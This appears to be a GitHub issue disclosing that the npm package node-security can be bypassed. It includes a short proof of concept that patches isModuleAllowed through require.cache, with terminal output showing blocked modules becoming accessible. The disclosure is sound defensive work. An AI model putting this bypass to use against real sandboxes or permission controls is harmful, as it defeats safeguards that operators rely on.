Security checks can be completely bypassed by a malicious script

First off, I started looking at this repository because it’s gaining traction. I’m also posting this here since there are no listed dependents on npm (yet).

I want to put forward my belief that you cannot secure a javascript context using javascript alone. This is why packages like vm2 exist (which wraps node’s vm module). This is also why node-security is inherently insecure unless you introduce a native component that modifies the behavior of the execution context. This is an extremely hard problem to solve.

Please do not use this package if you need a secure execution context.

The following code can bypass your module’s security checks entirely. Note that this took me roughly 5 minutes to reverse engineer. Any attempts to obscure this will fail.

/* secure.js */

const nodesecurity = require( '@matthaywardwebdesign/node-security' );
const NodeSecurity = new nodesecurity();

// Don't allow anything at all.
NodeSecurity.configure({});

/* index.js */

function try_require(name) {
	try {
		require(name);
		console.log(name, '\x1b[1;32mOK\x1b[m');
	} catch (e) {
		console.error(name, '\x1b[1;31mFAIL\x1b[m -', e.message);
	}
}

try_require('http');
try_require('fs');
try_require('net');

/* bypass.js */

require.cache[Object.keys(require.cache).filter(s => /node-security\/dist\/ModuleLoader\.js$/.test(s))[0]].exports.default.prototype.isModuleAllowed = () => true;

$ node ./index.js
http OK
fs OK
net OK

$ node -r ./secure.js ./index.js
http FAIL - NodeSecurity has blocked an attempt to access module 'http'. Parent modules = ['/private/tmp/test-node-security/index.js']
fs FAIL - NodeSecurity has blocked an attempt to access module 'fs'. Parent modules = ['/private/tmp/test-node-security/index.js']
net FAIL - NodeSecurity has blocked an attempt to access module 'net'. Parent modules = ['/private/tmp/test-node-security/index.js']

$ node -r ./secure.js -r ./bypass.js ./index.js
http OK
fs OK
net OK